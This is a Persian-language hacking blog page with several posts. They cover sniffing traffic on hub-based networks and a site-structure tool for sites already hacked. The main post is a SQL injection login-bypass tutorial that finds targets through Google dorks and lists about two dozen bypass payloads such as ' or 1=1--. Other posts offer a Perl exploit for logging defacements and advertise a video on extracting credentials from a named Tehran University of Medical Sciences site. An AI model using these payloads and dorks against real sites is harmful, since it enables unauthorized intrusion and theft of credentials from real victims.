تبليغات

چگونگی استراق سمع از هاب؟

خب تا حالا حتما اسم هاب یا سوییچ رو شنیدین همون وسیله هایی هستن که تو شبکه محلی برای اتصال دستگاه ها به همازشون استفاده می کنن خب اگه دقت کرده باشین اکثر شبکه محلی ها با هاب ساخته شده اند البته کم نیستن شبکه هایی که با سوییچ هستن!؟ولی حالا من کل رو در نظر می گیرم

حالا هاب چطوری کار می کنه؟

هاب میاد یه فریم رو از ورودیش می گیره و بعد اونو رو تمام خروجی هاش می فرسته یعنی همه می تونن اونو دریافت کنن

به این ترتیب به راحتی اگه شما روی یکی از سیستم ها یه اسنیف نصب کنین می تونن تمام ترافیک شبکه رو دریافت کنن حالا اینجا چند تا ابزار هست که برای لینوکس هست من تا حالا ابزاری برای ویندوز ندیدم!؟

Snort

www.snort.org

sniffit

www.reptile.rug.ac.be/~coder/sniffit/sniffit.html

خب هر دوی اینا خوب هستن ولی برا ی لینوکس هست می گن اسنورت برای ویندوز هم کار می کنه ولی من که دارم کار نمی کنه یعنی اصلا باز نمیشه که کار کنه

حالا اگه شبکه با سوییچ باشه چی؟

اون موقع ما باید یه کار دیگه بکنیم یعنی...!؟ برین دنبالش تا به جوابش برسین

حالا اگه واسه ویندوز رو پیدا کردین خبرم کنین

خوب در مورد این برنامه یه خورده توضیح بدم شما سایتی رو هک کردید یوزر و پس هم ردیف شده اما صحفه لوگین رو نمیدونین دیگه باید متوجه شده باشین منظورم چیه این برنامه ساختار سایت رو بهتون نشون میده

لینک دانلود

يكي از نقطه ضعف هاي Sql رشته ي ساختار ان ميباشد كه هميشه آسيب پذير بوده و مورد حمله قرار ميگيرد اين آموزش به شما روشهايي ياد ميده كه بتوانيد اين ساختار را مورد حمله قرار بدهيد .
حالا ميتوانيد در گوگل عبارت زير را سرچ كنيد :
allinurl: login.asp
در جواب براي شما تقريبا 17 هزار مورد پيدا ميكند . حالا به لينك يافته ها دقت كنيد مثلا چنين خواهيد يافت :
www.site.com/login.asp
يا چيزهايي مشابه اين . اين قسمتها را ميتوانيم مورد حمله قرار دهيم . حالا به ساده ترين سمت رسيديم كافي است براي رد كردن اين مانع بصورت زير عمل كنيد بجاي يوزر نيم Admin را بزنيد و بجاي پسورد از اين عبارت استفاده كنيد:
or 1=1—
شايد تا حالا كه مقاله را خوانده ايد تعجب كرده ايد كه اين امر چگونه امكان پذير است . در تمامي اين عمليات اطلاعات لاگين شما بصورت Query فرستاده ميشود . اگر اطلاعات درست باشد شما اجازه ي ورود خواهيد يافت وگرنه با پيغام Login Failed مواجه خواهيد شد . وقتي شما ارسالي را با يوزر ادمين و با پسورد 1234 را ارسال ميكنيد از حالت اول به حالت دوم تغيير پيدا ميكند :
حالت اول :
"select *from table1 where login=""&log&""and password=""pwd&"" '
حالت دوم‌:

"select *from table1 where login="Admin"and password="1234" '
حالا با استفاده از اين تركيبات شما ميتوانيد با توجه به ساختار اس كيو ال براي آن پسورد هايي ارسال كنيد كه در صورت قرار گرفتن در اين پسورد مورد قبول قرار گيرد و در واقع با استفاده از نقطه ضعف Query Stringsبه آن حمله كند . اين تركيبات كه با توجه به ساختار اس كيو ال نوشته شده به اين صورت ميباشد نمونه هايي از آن مشاهده ميكنيد :
admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

همانطور كه مشاهده كرديد اين روش يك روش ساده اما ابتكاري مباشد كه احتياج به تفكر دقيق دارد البته ساختار ها متفاوت ميباشند و شما ميتوانيد همه ي اين تركيبات بالا را به عنوان پسورد امتحان كنيد و حتما به جواب خواهيد رسيد .

سلام دوستان امروز هم گفتم یه اکسپلویت واسه شما بذارم کارش اینه که اگه سایت هک کردین دیگه تو Zone نمیرین که وقتتون هدر بره این اکسپلویت واستون ثبت میکنه اکسپلویت به زبان پرل هستش و باید اکتیو پرل رو سیستمتون نصب باشه. یکی از دوستان هم سوال کرده بود که سایتهای آسیب پذیر Sql را از گوگل پیدا کنیم . خوب دوست عزیز شما باید به این صورت تو گوگل سرچ بزنین inurl view.asp?id= امیدورام که متوجه منظورم شده باشی

لینک دانلود

 در این فیلم آموزشی یاد میگیرین چطور با دستورات SQL یوزر و پس سایت معاونت غذا و دارو دانشگاه علوم پزشکی تهران رو بکشین بیرون

سایتهای ایرانی زیاده و 99% با این روش هک میشن .

لینک دانلود